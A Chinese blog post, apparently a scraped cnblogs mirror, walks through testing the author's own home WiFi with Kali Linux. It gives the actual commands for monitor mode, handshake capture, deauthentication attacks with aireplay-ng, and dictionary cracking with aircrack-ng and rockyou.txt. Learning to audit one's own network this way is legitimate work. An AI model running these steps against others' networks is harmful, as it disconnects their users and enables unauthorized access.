zoukankan      html  css  js  c++  java
  • 记一次对自己家中WiFi的安全检测过程

    在网上看到一篇检测WiFi安全性的文章,便突发奇想对自己家中的路由器进行一波安全检测,以便防范自己家中我WiFi安全,本过程的目标WiFi为自己的,请勿用于其他用途!

    刚开始的时候按照网络上文章进行了实验,但是遇到了一些文章中没有提到的东西,通过一定的摸索达到了预期的目标,把过程记录一下方便大家交流学习。

    设备要求

    Kali系统
    虚拟机
    自家WiFi
    无线网卡一枚

    一、虚拟机安装Kali系统

    由于网上教程很多,就不在这里一一赘述了,只要安装上Kali就行

    二、 网卡连接虚拟机

    由于截图软件有问题,在这说一下连接网卡的方法
    在这里插入图片描述
    在虚拟机选项卡>可移动设备>找到 自己的无线网卡,选择连接。

    三、查看网卡是否支持监听模式

    # airmon-ng //查看网卡是否支持监听模式
    

    在这里插入图片描述
    如图,显示了wlan0,说明网卡支持监听模式

    四、设置监听模式

    airmon-ng start wlan0  //开启监听模式
    

    五、扫描WiFi

    # airodump-ng wlan0mon
    

    在这里插入图片描述
    CTRL+C 结束扫描
    在这里找到自己的WiFi

    五、对WiFi抓包

    # airodump-ng -w freedom -c 10 --bssid  08:57:00:2E:57:CF wlan0mon
    

    在这里插入图片描述

    六、对指定设备发送反认证包

    # aireplay-ng -0 20 -a 08:57:00:2E:57:CF -c 0C:B5:27:D5:CA:D1 wlan0mon
    -a 后面是WiFi地址
    -c 后面是连接终端地址
    -0 后面的2是反认证包的个数
    

    在这里插入图片描述

    七、查看第六步的抓包状态

    在这里插入图片描述
    等了好大一会,还是没什么反应,看来WiFi还是比较可以的。
    当出现了类似这样的时候就可以用字典跑了在这里插入图片描述

    八、暴力尝试

    # aircrack-ng -a2 -b 08:57:00:2E:57:CF -w/usr/share/wordlists/rockyou.txt ~/*.cap
    

    Kali自带的字典位置:/usr/share/wordlists/rockyou.txt.gz

    解压命令(终端在上面目录打开):

    gzip -d rockyou.txt.gz

    参考文章1
    参考文章2
    参考文章3

  • 相关阅读:
    poj 2262 筛法求素数(巧妙利用数组下标!)
    BestCoder Round #65 (ZYB's Premutation)
    BestCoder Round #65 (ZYB's Game)
    BestCoder Round #65 (ZYB's Biology)
    筛法求素数
    常见OJ提交结果对照表
    CSS3伸缩盒Flexible Box
    移动开发屏幕适配分析
    用PHP抓取页面并分析
    安装最新版本的PHPUnit后,不能使用
  • 原文地址:https://www.cnblogs.com/ymyguang/p/12854670.html
Copyright © 2011-2022 走看看